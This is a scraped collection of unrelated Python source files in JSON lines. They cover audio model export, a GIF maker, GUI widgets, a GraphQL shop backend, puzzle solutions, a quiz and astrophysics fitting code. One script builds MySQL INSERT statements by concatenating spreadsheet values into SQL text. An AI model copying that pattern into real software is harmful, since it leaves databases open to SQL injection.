isinstance(child, cc.convs.ConvTranspose1d):\n conv = nn.ConvTranspose1d(\n child.in_channels,\n child.out_channels,\n child.kernel_size,\n child.stride,\n child.padding,\n child.output_padding,\n child.groups,\n child.bias,\n child.dilation,\n child.padding_mode,\n )\n conv.weight.data.copy_(child.weight.data)\n if conv.bias is not None:\n conv.bias.data.copy_(child.bias.data)\n setattr(model, name, conv)\n else:\n recursive_replace(child)\n\n recursive_replace(pretrained)\n\n x = torch.randn(1, 1, 2**15)\n pretrained(x)\n\n name = os.path.basename(os.path.normpath(FLAGS.run))\n export_path = os.path.join(FLAGS.run, name)\n 
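# (editor's note, an assumption about intended use) marking axis 2 of\n    # \"audio_in\" as dynamic below lets the exported graph accept audio buffers\n    # of arbitrary length at inference time, not just the 2**15-sample dummy input.\n    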
torch.onnx.export(\n pretrained,\n x,\n f\"{export_path}.onnx\",\n export_params=True,\n opset_version=12,\n input_names=[\"audio_in\"],\n output_names=[\"audio_out\"],\n dynamic_axes={\n \"audio_in\": {\n 2: \"audio_length\"\n },\n \"audio_out\": [0],\n },\n do_constant_folding=False,\n )\n\n\nif __name__ == '__main__':\n app.run(main)","repo_name":"acids-ircam/RAVE","sub_path":"scripts/export_onnx.py","file_name":"export_onnx.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":1043,"dataset":"github-code","pt":"8"} +{"seq_id":"40549218079","text":"from PIL import Image as im \r\nimport glob\r\nimport os\r\n\r\n\r\ndef create_gif(folder):\r\n frame = []\r\n new_folder = folder + \"/*.png\"\r\n img = glob.glob(new_folder)\r\n\r\n for i in img:\r\n cur_img = im.open(i)\r\n frame.append(cur_img)\r\n \r\n path = folder + \".gif\"\r\n frame[0].save(path , format = \"GIF\" , append_images=frame[1:], save_all=True, duration=100, loop=0)\r\n\r\n\r\ncwd = os.getcwd()\r\nfolder = os.listdir(cwd)\r\n\r\nfor x in folder:\r\n if os.path.isdir(x):\r\n create_gif(x)","repo_name":"mandalsudipti/Image-To-GIF","sub_path":"gif_maker.py","file_name":"gif_maker.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"4023117638","text":"from tkinter import * # from x import * is bad practice\nfrom ServerGui.StatusCircle import StatusCircle\nfrom PIL import Image, ImageTk\n\n\nclass SmartroomListElement(LabelFrame):\n sc = \"\"\n smartroom = \"\"\n set_icon = \"\"\n set_img = Image.open(\"ServerGui/setting.png\")\n set_img = set_img.resize((20, 20))\n\n def __init__(self, parent, origin, key, *args, **kw):\n super().__init__(master = parent, *args, **kw)\n self.parent = parent\n self.origin = origin\n self.smartroom = key\n\n self.set_icon = ImageTk.PhotoImage(self.set_img)\n\n smart_frame = Frame(self, bg = self[\"bg\"])\n smart_frame.grid(row = 0, column = 0, padx = 5, pady = 5, sticky = W)\n\n conn_frame = Frame(self, bg = self[\"bg\"])\n conn_frame.grid(row = 0, column = 1, padx = 5, pady = 5)\n label2 = Label(conn_frame, text=\"Connection status: \", bg = self[\"bg\"])\n label2.pack(padx = 10, pady = 5, side = LEFT)\n self.sc = StatusCircle(conn_frame, height = 30, width = 30, bg = self[\"bg\"])\n self.sc.pack(padx = 5, pady = 5)\n\n self.grid_columnconfigure(2, weight=1)\n settingButton = Button(self, image = self.set_icon, command = self.showSmartRoom, bg = self[\"bg\"])\n settingButton.grid(row = 0, column = 2, padx = 5, pady = 5, sticky = E)\n\n def changeStatus(self):\n self.sc.change();\n\n def showSmartRoom(self):\n self.origin.window.server.retriveSensorList(self.smartroom)\n self.origin.roomCard(self.smartroom)\n","repo_name":"SmartRoomCorporation/SmartRoom","sub_path":"server/src/main/ServerGui/SmartroomListElement.py","file_name":"SmartroomListElement.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"17778405741","text":"#!/usr/bin/env python\n\nimport base_filters\n\nCOPY_GOOGLE_DOC_KEY = '1hrAN4ABVe0_Qkz9CSOp8SmOYZg76bCc1UxjE0RafPFM'\n\nUSE_ASSETS = False\n\n# Use these variables to override the default cache timeouts for this graphic\n# DEFAULT_MAX_AGE = 20\n# ASSETS_MAX_AGE = 300\n\nJINJA_FILTER_FUNCTIONS = 
base_filters.FILTERS\n","repo_name":"nprapps/graphics-archive","sub_path":"2016/11/homeless-20161117/graphic_config.py","file_name":"graphic_config.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"8"} +{"seq_id":"10842717038","text":"import unittest\r\nclass Solution(object):\r\n    '''\r\n    In some array arr, the values were in arithmetic progression: the values arr[i+1] - arr[i] are all equal for every 0 <= i < arr.length - 1.\r\n\r\n    Then, a value from arr was removed that was not the first or last value in the array.\r\n\r\n    Return the removed value.\r\n\r\n\r\n    Example 1:\r\n\r\n    Input: arr = [5,7,11,13]\r\n    Output: 9\r\n    Explanation: The previous array was [5,7,9,11,13].\r\n    Example 2:\r\n\r\n    Input: arr = [15,13,12]\r\n    Output: 14\r\n    Explanation: The previous array was [15,14,13,12].\r\n    '''\r\n    def missingNumber(self, arr):\r\n        \"\"\"\r\n        :type arr: List[int]\r\n        :rtype: int\r\n        \"\"\"\r\n        # integer division keeps the common difference (and the answer) an int\r\n        d = (arr[-1] - arr[0]) // len(arr)\r\n\r\n        for i in range(1,len(arr)):\r\n            if d != arr[i] - arr[i-1]:\r\n                return arr[i-1] + d\r\n        return 0\r\n\r\nclass Test(unittest.TestCase):\r\n    def test_missingNumber(self):\r\n        data = [5,7,11,13]\r\n        expected = 9\r\n        sol = Solution()\r\n        self.assertEqual(sol.missingNumber(data),expected)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    print(Solution.__doc__)\r\n    unittest.main()","repo_name":"adheepshetty/leetcode-problems","sub_path":"Math/Missing Number In Arithmetic Progression.py","file_name":"Missing Number In Arithmetic Progression.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"10665951679","text":"'''Find a duplicate, Space Edition™.\n\nWe have a list of integers, where:\n\nThe integers are in the range 1..n\nThe list has a length of n + 1\nIt follows that our list has at least one integer which appears at least twice. \nBut it may have several duplicates, and each duplicate may appear more than twice.\n\nWrite a function which finds an integer that appears more than once in our list.\n (If there are multiple duplicates, you only need to find one of them.)\n\nWe're going to run this function on our new, super-hip MacBook Pro With Retina\n Display™. Thing is, the damn thing came with the RAM soldered right to the \n motherboard, so we can't upgrade our RAM. So we need to optimize for space!\n\n>>> find_duplicate([1, 2, 1, 3, 4, 6, 5])\n1\n>>> find_duplicate([1,1])\n1\n\n '''\n\ndef find_duplicate(lst):\n\n    floor = 1\n    ceiling = len(lst) - 1\n\n    while floor < ceiling:\n        mid = floor + (ceiling - floor) // 2\n        # found two ranges of numbers: floor..mid and mid+1..
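ceiling\n        # (editor's note, hedged) pigeonhole argument: whichever half contains more\n        # items than it has distinct possible values must hold a duplicate, so the\n        # search space halves on every pass while only O(1) extra space is used.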
\n\n\n        numbers_in_lower_range = 0\n        lower_floor = floor\n        lower_ceiling = mid\n\n        for item in lst:\n            if item >= lower_floor and item <= lower_ceiling:\n                numbers_in_lower_range += 1\n\n        lower_range_len = lower_ceiling - lower_floor + 1\n\n        if numbers_in_lower_range > lower_range_len:\n            ceiling = lower_ceiling\n        else:\n            floor = mid + 1  # the duplicate must be in the upper range\n\n    return ceiling\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n    import doctest\n\n    if doctest.testmod().failed == 0:\n        print('\\n***PASSED***\\n')\n","repo_name":"LisaLen/code-challenge","sub_path":"interview_cake_chals/find_repeat_space_edition.py","file_name":"find_repeat_space_edition.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"15152511295","text":"\nimport xlrd\nimport sys\nfrom mysql import MysqlOperation\n\n# incoming data\n\n\n# 'tpye' (type) indicates the table being inserted into; 'hang' indicates the primary key of the insert\n\n\ndef _ref(_type, data):\n    _type = str(_type)\n    print(_type, data)\n    obj = MysqlOperation()  # DB helper instance\n    insertsql = 'INSERT ignore INTO excel(content,_image,_image1,_image2,content_time,ratesku,ratesku2,user,id)VALUES(\"' +data[0] + '\",\"' +data[1] + '\",\"' +data[2] +'\",\"' +data[3] +'\",\"' +data[4] +'\",\"' +data[5] +'\",\"' +data[6] +'\",\"' +data[7]+'\",\"'+_type+'\")'\n    print(insertsql)\n\n    sql = \"\"\"\n    create table if not exists excel(\n    content varchar(30) not null, \n    _image varchar(30) not null,\n    _image1 varchar(30) not null,\n    _image2 varchar(30) not null,\n    content_time varchar(30) not null,\n    ratesku varchar(30) not null,\n    ratesku2 varchar(30) not null,\n    user varchar(30) not null,\n    id varchar(30) not null,\n    primary key ( `id` )\n    )\"\"\"\n    print(\"sql\", _type, sql)\n    obj.__enter__()\n    obj.execute(sql)\n    obj.execute(insertsql) \n    obj.__exit__()\n\n\ndef read_excel():\n    book = xlrd.open_workbook('pike.xlsx')\n    sheet1 = book.sheets()[0]\n    nrows = sheet1.nrows\n    # print('total number of rows', nrows)\n    ncols = sheet1.ncols\n    # print('total number of columns', ncols)\n    _list = []\n    for lie in range(nrows):\n        # print(sheet1.cell(0, 2).value)\n        for hang in range(ncols):\n\n            print(lie, hang)\n            #\n            try:\n                data = sheet1.cell(lie, hang).value\n                if not isinstance(data, str):\n                    data = str(data)\n                else:\n                    print()\n                print(\"type\", type(data))\n\n                if (data == \"\" or data is None):\n                    # print(\"value is empty\", data)\n                    _list.append(\"\")\n                else:\n                    # _ref(lie, sheet1.cell(hang, lie).value, hang)\n                    # print(\"dd\")\n                    _list.append(data)\n            except:\n                print(\"error\")\n                pass\n                continue\n\n        # print('\\n')\n        print(\"next row\")\n        # print(\"list\", _list)\n        _ref(lie, _list)\n        _list.clear()\n\n\n    # print('value of the cell at row 3, column 3:', cell_3_3)\n    # book = xlrd.open_workbook('pike.xlsx')\n    # sheet1 = book.sheets()[0]\n    # nrows = sheet1.nrows\n    # print('total number of rows',nrows)\n    # ncols = sheet1.ncols\n    # print('total number of columns',ncols)\n    # row3_values = sheet1.row_values(2)\n    # print('values of row 3',row3_values)\n    # col3_values = sheet1.col_values(2)\n    # print('values of column 3',col3_values)\n    # cell_3_3 = sheet1.cell(2,2).value\n    # print('value of the cell at row 3, column 3:',cell_3_3)\nif __name__ == '__main__':\n    read_excel()\n    # sys.exit()\n","repo_name":"zhiseyinghua/pachong","sub_path":"excel/zhuan.py","file_name":"zhuan.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"8"} +{"seq_id":"36084549921","text":"from pyramid.threadlocal import get_current_request\n\nfrom pyramid.security import (\n    Allow,\n    Everyone,\n    Authenticated,\n    authenticated_userid,\n    has_permission,\n)\n\nfrom pyrtos.models import User\n\n\nclass 
EntryFactory(object):\n \"\"\"\n A standard Pyramid EntryFactory object snagged and extended\n from one of the pyramid tutorials @ readthedocs.\n\n This is just a simple mockup class for the begining of the\n project.\n \"\"\"\n __name__ = None\n __parent__ = None\n __acl__ = [(Allow, Authenticated, 'view'),\n (Allow, Authenticated, 'create'),\n (Allow, Authenticated, 'edit'),\n (Allow, 'group:admin', 'delete'),\n (Allow, 'group:admin', 'archive'),\n (Allow, 'group:admin', 'restore'), ]\n\n def __init__(self, request):\n pass\n\n\ndef groupfinder(userid, request):\n \"\"\"\n A simple groupfinder for picking the right permission\n to the right users.\n\n userid -- integer, userid.\n request -- object, standard request object.\n \"\"\"\n user = User.by_id(userid)\n group = user.group\n return ['group:'+group]\n\n\ndef can_i(request, perm):\n \"\"\"\n Function for checking permisssions based on users group\n identification. This function is made for use in templates.\n\n request -- object, standard request object.\n perm -- string, for matching against group permission.\n \"\"\"\n return has_permission(perm, request.context, request)\n","repo_name":"plastboks/Pyrtos","sub_path":"pyrtos/security.py","file_name":"security.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"} +{"seq_id":"22996865950","text":"import graphene\nfrom django.db.models import F\nfrom products.models import Product\nfrom accounts.models import CustomUser\nfrom django.contrib.auth import authenticate\nfrom graphql_jwt.settings import jwt_settings\nfrom orders.models import Cart, Order, PaymentType, BillingInfo, CartObject\nfrom .types import(ProductType, TagsType, ColorsType, UsersType,\n UsersAuthType, OrderType, BillingInfoType, PaymentTypeType)\nfrom django_graphene_permissions.permissions import permissions_checker, IsAuthenticated\n\n\nclass UpdateCart(graphene.Mutation):\n payload = graphene.Boolean()\n\n class Arguments:\n cart = graphene.String()\n item = graphene.String()\n authed = graphene.Boolean()\n action = graphene.String()\n\n def mutate(self, info, cart, item, authed, action):\n actions = [\"inc\", \"dec\"]\n if not action in actions:\n raise Exception(\"action unknown\")\n if authed:\n if not info.context.user.is_authenticated:\n raise Exception(\"user is not authenticated\")\n cart = Cart.objects.filter(user=info.context.user)\n if not cart.exists():\n raise Exception(\"cart not found authed\")\n try:\n if action == \"dec\":\n cart[0].items.filter(id=item).update(amount=F('amount')-1)\n if action == \"inc\":\n cart[0].items.filter(id=item).update(amount=F('amount')+1)\n except Exception as e:\n raise Exception(e)\n else:\n cart = Cart.objects.filter(anon_usr=cart)\n if not cart.exists():\n raise Exception(\"cart not found\")\n try:\n if action == \"dec\":\n cart[0].items.filter(id=item).update(amount=F('amount')-1)\n if action == \"inc\":\n cart[0].items.filter(id=item).update(amount=F('amount')+1)\n except Exception as e:\n raise Exception(e)\n return RemoveCartItem(payload=True)\n\n\nclass RemoveCartItem(graphene.Mutation):\n payload = graphene.Boolean()\n\n class Arguments:\n cart = graphene.String()\n item = graphene.String()\n authed = graphene.Boolean()\n\n def mutate(self, info, cart, item, authed):\n if authed:\n if not info.context.user.is_authenticated:\n raise Exception(\"user is not authenticated\")\n cart = Cart.objects.filter(user=info.context.user)\n if not cart.exists():\n raise Exception(\"cart 
not found authed\")\n try:\n cart[0].items.filter(id=item).delete()\n except Exception as e:\n raise Exception(e)\n else:\n cart = Cart.objects.filter(anon_usr=cart)\n if not cart.exists():\n raise Exception(\"cart not found\")\n try:\n cart[0].items.filter(id=item).delete()\n except Exception as e:\n raise Exception(e)\n return RemoveCartItem(payload=True)\n\n\nclass AddToCartAnon(graphene.Mutation):\n payload = graphene.Boolean()\n\n class Arguments:\n product = graphene.String()\n amount = graphene.Int()\n cart = graphene.String()\n\n def mutate(self, info, product, amount, cart):\n prod = Product.objects.filter(id=product)\n if not prod.exists():\n raise Exception(\"product not found\")\n finCart = None\n userCart = Cart.objects.filter(anon_usr=cart)\n if userCart.exists():\n finCart = userCart[0]\n else:\n finCart = Cart.objects.create(anon_usr=cart)\n finCart.items.create(\n product=prod[0], amount=amount)\n return AddToCartUsr(payload=True)\n\n\nclass AddToCartUsr(graphene.Mutation):\n payload = graphene.Boolean()\n\n class Arguments:\n product = graphene.String()\n amount = graphene.Int()\n\n def mutate(self, info, product, amount):\n prod = Product.objects.filter(id=product)\n if not prod.exists():\n raise Exception(\"product not found\")\n finCart = None\n userCart = Cart.objects.filter(user=info.context.user)\n if userCart.exists():\n finCart = userCart[0]\n else:\n finCart = Cart.objects.create(user=info.context.user)\n finCart.items.create(\n product=prod[0], amount=amount)\n return AddToCartUsr(payload=True)\n\n\nclass NewUserMutation(graphene.Mutation):\n payload = graphene.Field(UsersAuthType)\n\n class Arguments:\n first_name = graphene.String()\n last_name = graphene.String()\n phone = graphene.String()\n email = graphene.String()\n birth_date = graphene.Date()\n password = graphene.String()\n cart_id = graphene.String()\n\n def mutate(self, info, first_name, last_name, phone, email, password, birth_date, cart_id):\n try:\n user = CustomUser.objects.create(\n email=email, first_name=first_name, last_name=last_name, phone=phone,\n birth_date=birth_date\n )\n user.username = str(user.user_id)\n user.set_password(password)\n user.save()\n # check cart status and creat a new one\n cart = Cart.objects.filter(anon_usr=cart_id)\n if cart.exists():\n print('HEYYYYYY')\n cart.update(user=user, anonnymous=False)\n else:\n Cart.objects.create(\n user=user, anonnymous=False, anon_usr=cart_id)\n usr = authenticate(request=info.context.session,\n username=email, password=password)\n payload = jwt_settings.JWT_PAYLOAD_HANDLER(usr, info.context)\n token = jwt_settings.JWT_ENCODE_HANDLER(payload, info.context)\n\n except Exception as e:\n raise Exception(e)\n return NewUserMutation(payload={\"udata\": user, \"token\": token})\n\n\nclass AddOrder(graphene.Mutation):\n payload = graphene.Field(OrderType)\n\n class Arguments:\n full_name = graphene.String()\n phone = graphene.String()\n address_line = graphene.String()\n city = graphene.String()\n region = graphene.String()\n payment = graphene.String()\n\n @permissions_checker([IsAuthenticated])\n def mutate(self, info, full_name, phone, address_line, city, region, payment):\n user = info.context.user\n userCart = Cart.objects.filter(user=user)\n billingInfo = BillingInfo.objects.create(\n address_line=address_line, city=city, full_name=full_name, phone=phone, region=region\n )\n # check payment option availablity\n payment_opt = PaymentType.objects.filter(type_id=payment)\n if not payment_opt.exists():\n raise Exception(\"payment type 
unknown\")\n order = Order.objects.create(\n paid_already=False, ordered_by=user,\n billing_info=billingInfo,\n payment_type=payment_opt[0])\n # order.billing_info\n if not userCart[0].items.exists():\n raise Exception(\"cart is empty\")\n\n for cart in userCart[0].items.all():\n order.products.add(\n cart\n )\n # clear the cart after checkout\n userCart[0].items.clear()\n return AddOrder(payload=order)\n\n\nclass SubmitRefId(graphene.Mutation):\n payload = graphene.Boolean()\n\n class Arguments:\n order = graphene.String()\n ref = graphene.String()\n\n @permissions_checker([IsAuthenticated])\n def mutate(self, info, order, ref):\n # TO DO CHECK ORDERED BY FLAG LATER\n order = Order.objects.filter(\n core_order_id=order, ordered_by=info.context.user)\n if not order.exists():\n raise Exception(\"order not found\")\n order.update(reference_no=ref)\n return SubmitRefId(payload=True)\n","repo_name":"amenabe22/taywan_shop","sub_path":"taywan_backend/mutations.py","file_name":"mutations.py","file_ext":"py","file_size_in_byte":7925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"13921954490","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\ndrive = webdriver.Chrome()\ndrive.get('http://www.baidu.com')\ntime.sleep(3)\n#drive.find_element_by_xpath(\"//input[@id='kw' and @name='wd']\").send_keys('baidu')\n#drive.find_elements_by_css_selector('.s_ipt').send_keys('baidu')\n#drive.find_element(By.ID,\"kw\").send_keys('1111')\ndrive.find_element(\"id\",\"kw\").send_keys('1111')\ndrive.implicitly_wait(2)\n#定位编码\nst = drive.current_window_handle\nprint(st)\n#截图\ndrive.save_screenshot('page.png')\ndrive.quit()","repo_name":"suntianxu/Inter_Auto_Test","sub_path":"new_demo/new_demo01/demo01.py","file_name":"demo01.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"20253824533","text":"import random\ndef out_res_expr(s):\n\tif (s.find('+') != -1):\n\t\tp = s.split('+')\n\t\treturn (int(p[0]) + int(p[1]))\n\tif (s.find('-') != -1):\n\t\tp = s.split('-')\n\t\treturn (int(p[0]) - int(p[1]))\n\tif (s.find('*') != -1):\n\t\tp = s.split('*')\n\t\treturn (int(p[0]) * int(p[1]))\ndef rand_simple():\n\ta=random.randint(2,9)\n\tb=random.randint(2,9)\n\tz=random.choice('+-*')\n\ts=str(a)+z+str(b)\n\tprint(s)\n\treturn(s)\ndef inp():\n\twhile True:\n\t\ttry:\n\t\t\tvar = int(input())\n\t\t\tmessage = \"Incorrect format\"\n\t\t\tassert (var==1 or var==2), message\n\t\t\tbreak\n\t\texcept ValueError:\n\t\t\tprint(\"Incorrect format\")\n\t\texcept AssertionError as err:\n\t\t\tprint(err)\n\treturn var\ndef input_user():\n\twhile True:\n\t\ttry:\n\t\t\tuser = int(input())\n\t\t\tbreak\n\t\texcept ValueError:\n\t\t\tprint(\"Incorrect format\")\n\treturn user\ndef exam(var, i):\n\tif var == 1:\n\t\ts = rand_simple()\n\t\tuser = input_user()\n\t\tres = out_res_expr(s)\n\telse:\n\t\ts = random.randint(11, 29)\n\t\tprint(s)\n\t\tuser = input_user()\n\t\tres = s * s\n\tif user == res:\n\t\tprint(\"Right!\")\n\t\ti += 1\n\telse:\n\t\tprint(\"Wrong!\")\n\treturn i\ndef write_res(name,i,var,level):\n\tfile=open(\"results.txt\",'a')\n\tfile.write(name+\": \"+str(i)+\"/5 in level \"+str(var)+\" (\"+level+\").\\n\")\n\nprint(\"Which level do you want? 
Enter a number:\")\nprint(\"1 - simple operations with numbers 2-9\")\nprint(\"2 - integral squares of 11-29\")\nvar=inp()\nif var==1:\n\tlevel=\"simple operations with numbers 2-9\"\nelse:\n\tlevel=\"integral squares of 11-29\"\ni=0\nfor _ in range(5):\n\ti=exam(var, i)\nprint(f\"Your mark is {i}/5. Would you like to save the result? Enter yes or no.\")\nans=input()\nif ans.lower() in \"yes\":\n\tprint(\"What is your name?\")\n\tname=input()\n\twrite_res(name,i,var,level)\n\tprint('The results are saved in \"results.txt\"')\n\n\n","repo_name":"JuliaBelokopytskaya/Python_Core","sub_path":"Arithmetic-Exam-Application/arithmetic.py","file_name":"arithmetic.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"44591594227","text":"#!/usr/bin/env python\n\nimport warnings\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport astropy.units as u\n\nfrom astropy.modeling.powerlaws import PowerLaw1D\nfrom astropy.modeling.polynomial import Polynomial1D\nfrom astropy.modeling.models import (\n Linear1D,\n Drude1D,\n Gaussian1D,\n Lorentz1D,\n custom_model,\n)\nfrom astropy.modeling.fitting import LevMarLSQFitter, LinearLSQFitter\nfrom astropy import uncertainty as unc\n\nfrom measure_extinction.extdata import ExtData\nfrom measure_extinction.stardata import StarData\nfrom measure_extinction.plotting.plot_spec import plot_spectrum\nfrom dust_extinction.conversions import AxAvToExv\n\nfrom emcee_fitting import EmceeFitter\n\n# gamma function (wavelength dependent width, replacing the FWHM)\ndef gamma(x, x_o=1, gamma_o=1, asym=1):\n return 2.0 * gamma_o / (1.0 + np.exp(asym * (x - x_o)))\n\n\n# asymmetric Gaussian\ndef gauss_asymmetric(x, scale=1, x_o=1, gamma_o=1, asym=1):\n # gamma replaces FWHM, so stddev=gamma/(2sqrt(2ln2))\n y = scale * np.exp(\n -((x - x_o) ** 2)\n / (2 * (gamma(x, x_o, gamma_o, asym) / (2 * np.sqrt(2 * np.log(2)))) ** 2)\n )\n return y\n\n\n# \"asymmetric\" Drude\ndef drude_asymmetric(x, scale=1, x_o=1, gamma_o=1, asym=1):\n y = (\n scale\n * (gamma(x, x_o, gamma_o, asym) / x_o) ** 2\n / ((x / x_o - x_o / x) ** 2 + (gamma(x, x_o, gamma_o, asym) / x_o) ** 2)\n )\n return y\n\n\n# asymmetric Lorentzian\ndef lorentz_asymmetric(x, scale=1, x_o=1, gamma_o=1, asym=1):\n # gamma replaces FWHM, so gamma_formula=gamma/2\n y = (\n scale\n * (gamma(x, x_o, gamma_o, asym) / 2) ** 2\n / ((gamma(x, x_o, gamma_o, asym) / 2) ** 2 + (x - x_o) ** 2)\n )\n return y\n\n\ndef fit_function(\n dattype=\"elx\",\n functype=\"pow\",\n dense=False,\n profile=\"gauss_asym\",\n fixed=False,\n AV_guess=3,\n):\n \"\"\"\n Define the fitting function\n\n Parameters\n ----------\n dattype : string [default=\"elx\"]\n Data type to fit (\"elx\" or \"alax\")\n\n functype : string [default=\"pow\"]\n Fitting function type (\"pow\" for powerlaw or \"pol\" for polynomial)\n\n dense : boolean [default=False]\n Whether or not to fit the feature around 3 micron\n\n profile : string [default=\"gauss_asym\"]\n Profile to use for the features if dense = True (options are \"gauss\", \"drude\", \"lorentz\", \"gauss_asym\", \"drude_asym\", \"lorentz_asym\")\n\n fixed : boolean [default=False]\n Whether or not to add a fixed feature around 3 micron (for diffuse sightlines)\n\n AV_guess : float [default=3]\n Initial guess for A(V)\n\n Returns\n -------\n func : Astropy CompoundModel\n The fitting function\n \"\"\"\n # powerlaw model\n if functype == \"pow\":\n func = PowerLaw1D(fixed={\"x_0\": True})\n elif functype == 
\"pol\": # polynomial model\n func = Polynomial1D(degree=6)\n else:\n warnings.warn(\n 'Unknown function type, choose \"pow\" for a powerlaw or \"pol\" for a polynomial',\n stacklevel=2,\n )\n\n # add profiles for the features if requested\n if dense:\n # define different profiles\n # 1 Gaussian (stddev=FWHM/(2sqrt(2ln2)))\n gauss1 = Gaussian1D(mean=3, stddev=0.13, bounds={\"stddev\": (0.1, 0.2)})\n\n # 2 Gaussians (stddev=FWHM/(2sqrt(2ln2)))\n gauss2 = Gaussian1D(\n mean=3, stddev=0.13, bounds={\"stddev\": (0.12, 0.16)}\n ) + Gaussian1D(\n mean=3.4, stddev=0.14, bounds={\"mean\": (3.41, 3.45), \"stddev\": (0.14, 0.2)}\n )\n\n # 1 Drude\n drude1 = Drude1D(x_0=3, fwhm=0.3, bounds={\"fwhm\": (0.2, 0.5)})\n\n # 2 Drudes\n drude2 = Drude1D(x_0=3, fwhm=0.3) + Drude1D(\n x_0=3.4, fwhm=0.15, bounds={\"x_0\": (3.35, 3.43), \"fwhm\": (0.14, 0.3)}\n )\n\n # 1 Lorentzian\n lorentz1 = Lorentz1D(x_0=3, fwhm=0.3, bounds={\"x_0\": (2.99, 3.1)})\n\n # 2 Lorentzians\n lorentz2 = Lorentz1D(\n x_0=3, fwhm=0.3, bounds={\"x_0\": (2.99, 3.1), \"fwhm\": (0.28, 0.4)}\n ) + Lorentz1D(\n x_0=3.4, fwhm=0.15, bounds={\"x_0\": (3.35, 3.43), \"fwhm\": (0.14, 0.3)}\n )\n\n # 1 asymmetric Gaussian\n Gaussian_asym = custom_model(gauss_asymmetric)\n gauss_asym1 = Gaussian_asym(\n x_o=3,\n gamma_o=0.4,\n bounds={\"x_o\": (2.9, 3.1), \"gamma_o\": (0.35, 2), \"asym\": (-100, 100)},\n )\n\n # 2 asymmetric Gaussians\n gauss_asym2 = Gaussian_asym(\n x_o=3,\n gamma_o=0.3,\n bounds={\"x_o\": (2.99, 3.04), \"gamma_o\": (0.28, 0.5), \"asym\": (-10, 10)},\n ) + Gaussian_asym(\n x_o=3.4,\n gamma_o=0.15,\n bounds={\n \"x_o\": (3.3, 3.42),\n \"scale\": (0.005, None),\n \"gamma_o\": (0.15, 0.5),\n \"asym\": (-20, -4),\n },\n )\n\n # 1 \"asymmetric\" Drude\n Drude_asym = custom_model(drude_asymmetric)\n drude_asym1 = Drude_asym(\n x_o=3.0,\n gamma_o=0.3,\n bounds={\n \"scale\": (0, 2),\n \"x_o\": (2.5, 3.5),\n \"gamma_o\": (-2, 2),\n \"asym\": (-50, 50),\n },\n )\n\n # 2 \"asymmetric\" Drudes\n drude_asym2 = Drude_asym(x_o=3, gamma_o=0.3) + Drude_asym(\n x_o=3.4, gamma_o=0.15, bounds={\"x_o\": (3.35, 3.45)}\n )\n\n # 1 asymmetric Lorentzian\n Lorentzian_asym = custom_model(lorentz_asymmetric)\n lorentz_asym1 = Lorentzian_asym(x_o=3, gamma_o=0.3, bounds={\"x_o\": (2.95, 3.1)})\n\n # 2 asymmetric Lorentzians\n lorentz_asym2 = Lorentzian_asym(x_o=3, gamma_o=0.3) + Lorentzian_asym(\n x_o=3.4, gamma_o=0.15\n )\n\n profiles = {\n \"gauss1\": gauss1,\n \"drude1\": drude1,\n \"lorentz1\": lorentz1,\n \"gauss_asym1\": gauss_asym1,\n \"drude_asym1\": drude_asym1,\n \"lorentz_asym1\": lorentz_asym1,\n \"gauss2\": gauss2,\n \"drude2\": drude2,\n \"lorentz2\": lorentz2,\n \"gauss_asym2\": gauss_asym2,\n \"drude_asym2\": drude_asym2,\n \"lorentz_asym2\": lorentz_asym2,\n }\n func += profiles[profile]\n\n if fixed:\n # fit a fixed feature for diffuse sightlines\n Drude_asym = custom_model(drude_asymmetric)\n func += Drude_asym(\n x_o=3.017727049,\n gamma_o=0.462375776,\n asym=-2.873011454,\n bounds={\"scale\": (0, 2)},\n fixed={\"x_o\": True, \"gamma_o\": True, \"asym\": True},\n )\n\n # convert the function from A(lambda)/A(V) to E(lambda-V)\n if dattype == \"elx\":\n func = func | AxAvToExv(Av=AV_guess)\n\n return func\n\n\ndef fit_features_spec(star, path):\n \"\"\"\n Fit the features directly from the spectrum with different profiles\n\n Parameters\n ----------\n star : string\n Name of the reddened star for which to fit the features in the spectrum\n\n path : string\n Path to the data files\n\n Returns\n -------\n waves : np.ndarray\n Numpy array 
